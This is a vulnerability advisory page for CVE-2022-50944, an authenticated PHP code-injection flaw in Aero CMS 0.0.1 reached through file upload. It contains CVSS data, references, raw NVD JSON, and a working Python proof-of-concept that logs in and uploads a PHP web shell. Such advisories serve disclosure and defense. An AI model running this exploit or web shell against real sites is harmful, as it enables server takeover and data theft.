Security Vulnerability Report
CVE-2022-50944 CVSS 8.8 HIGH

CVE-2022-50944

Published: 2026-05-10 13:16:32
Last Modified: 2026-05-12 14:24:15

Description

Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with the source=add_post parameter, and the uploaded files are then executed by the server.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Aero CMS 0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target configuration
target_url = "http://target-ip/aerocms"
login_url = f"{target_url}/admin/login.php"
upload_url = f"{target_url}/admin/posts.php"

# Attacker credentials (requires low privilege)
username = "attacker"
password = "password"

# Malicious PHP code
php_code = "<?php system($_GET['cmd']); ?>"

# 1. Login to get session
session = requests.Session()
payload = {
    "username": username,
    "password": password,
    "login": "submit"
}
session.post(login_url, data=payload)

# 2. Upload malicious file
files = {
    'image': ('shell.php', php_code, 'application/octet-stream')
}
data = {
    'source': 'add_post',
    'title': 'Test Post'
}
response = session.post(upload_url, files=files, data=data)

if response.status_code == 200:
    print("[+] File uploaded successfully.")
    print("[+] Try accessing the uploaded file to execute commands.")
else:
    print("[-] Upload failed.")

References

https://github.com/MegaTKC/AeroCMS
https://www.exploit-db.com/exploits/51085
https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50944", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:32.137", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/MegaTKC/AeroCMS", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51085", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php", "source": "[email protected]"}]}}